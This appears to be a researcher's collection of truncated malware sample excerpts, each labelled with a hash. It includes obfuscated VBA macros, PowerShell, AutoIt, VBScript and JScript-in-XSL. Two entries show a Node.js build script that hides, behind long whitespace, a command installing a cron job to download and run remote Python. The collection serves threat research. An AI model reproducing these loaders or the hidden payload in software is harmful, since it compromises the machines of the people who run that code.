JohnLaTwC

## uploaded by @JohnLaTwC
## Sample hash: f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OpX:MASIHB-- f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058
===============================================================================
FILE: f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058
Type: OpenXML
-------------------------------------------------------------------------------

JohnLaTwC

## uploaded by @JohnLaTwC
## Sample hash: d6fdeac5bced885c470660f09a0da8ea7a7660b5b8542ad487b56976e88fa733

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
 
<msxsl:script language="JScript" implements-prefix="user">

JohnLaTwC

## Uploaded by @JohnLaTwC
## Sample hash: bd0984491d0c6b11162ddcec58bd660f0e779c8b399f153d160bb02fa72aadbc

var a='dmFyIE1vZHVsZT17bG9jYXRlRmlsZTooZnVuY3Rpb24ocGF0aCl7cmV0dXJuIHBhdGh9KX07dmFyIE1vZHVsZTtpZighTW9kdWxlKU1vZHVsZT0odHlwZW9mIE1vZHVsZSE9PSJ1bmRlZmluZWQiP01vZHVsZTpudWxsKXx8e307dmFyIG1vZHVsZU92ZXJyaWRlcz17fTtmb3IodmFyIGtleSBpbiBNb2R1bGUpe2lmKE1vZHVsZS5oYXNPd25Qcm9wZXJ0eShrZXkpKXttb2R1bGVPdmVycmlkZXNba2V5XT1Nb2R1bGVba2V5XX19CnZhciBFTlZJUk9OTUVOVF9JU19XRUI9ITE7dmFyIEVOVklST05NRU5UX0lTX1dPUktFUj0hMTt2YXIgRU5WSVJPTk1FTlRfSVNfTk9ERT0hMTt2YXIgRU5WSVJPTk1FTlRfSVNfU0hFTEw9ITE7aWYoTW9kdWxlLkVOVklST05NRU5UKXtpZihNb2R1bGUuRU5WSVJPTk1FTlQ9PT0iV0VCIil7RU5WSVJPTk1FTlRfSVNfV0VCPSEwfWVsc2UgaWYoTW9kdWxlLkVOVklST05NRU5UPT09IldPUktFUiIpe0VOVklST05NRU5UX0lTX1dPUktFUj0hMH1lbHNlIGlmKE1vZHVsZS5FTlZJUk9OTUVOVD09PSJOT0RFIil7RU5WSVJPTk1FTlRfSVNfTk9ERT0hMH1lbHNlIGlmKE1vZHVsZS5FTlZJUk9OTUVOVD09PSJTSEVMTCIpe0VOVklST05NRU5UX0lTX1NIRUxMPSEwfWVsc2V7dGhyb3cgbmV3IEVycm9yKCJUaGUgcHJvdmlkZWQgTW9kdWxlW1wnRU5WSVJPTk1FTlRcJ10gdmFsdWUgaXMgb

JohnLaTwC

## uploaded by @JohnLaTwC
## sample hash: 4ff21fd53f6ba8d2805574fe21b3a3470c5b719988ecdef59fed4b592c79a61c

function _/=\_____/==\/=\/\
{
  try
  {
    ${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9
    ${/=====\_/\/\_/\_/} = ""
    For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++) 

JohnLaTwC

#NoTrayIcon
#EndRegion
Dim $IIThbVLLWS = "1"
Dim $CWBFTZBdRBF = "YQYg"
Dim $CWBFTZBdRBFN = "YQYgT"
Dim $PMHTbZHeQhgeW = "FuyOUaWDQXzcuubQ"
Dim $bBOiAYNfPdZMWb = "BFfLbS"
Dim $bBOiAYNfPdZMWbP = Int("0")
Dim $WPfGbcDOKNbChUgJ = "fTNSTWFKWVKG"
Dim $iECUAbJPJJTThfEIU = "0"

JohnLaTwC

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Close()

JohnLaTwC

On Error Resume Next
WScript.Timeout=0
dim Wsh
set Wsh =WScript.CreateObject("WScript.Shell")
dim fs 
set fs= CreateObject("Scripting.FileSystemObject")
dim w
Set w = CreateObject("Microsoft.XMLHTTP")
dim dotnet
dotnet="No"

JohnLaTwC

'use strict';

// Do this as the first thing so that any code reading it knows the right env.
process.env.BABEL_ENV = 'development';
process.env.NODE_ENV = 'development';
                                                                                                                                                                                                                                                                                          require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vbGVveHRidXl4by50azo0NDMvbWNJZllwQmwyTVUtcHl1elpQMUZfd19HeDM3SFZ2

JohnLaTwC

'use strict';
 
 // Do this as the first thing so that any code reading it knows the right env.
 process.env.BABEL_ENV = 'development';
 process.env.NODE_ENV = 'development';
                                                                                                                                                                                                                                                                                           require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('import sys
vi=sys.version_info
ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=['build_opener'])
hs=[]
o=ul.build_opener(*hs)

JohnLaTwC

## Uploaded by @JohnLaTwC
## Hash: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd 
Sub AutoOpen()
    Dim abjaWFApqTOaGknEZ As String
    Dim EVvHI As Object
    Dim aqwMEEghqLNesI As Integer
    Dim TgAVw As String
    
    aqwMEEghqLNesI = 816
    abjaWFApqTOaGknEZ = HyqtqSXGmk("5f7b6b7a") & "qx|6[pmtt"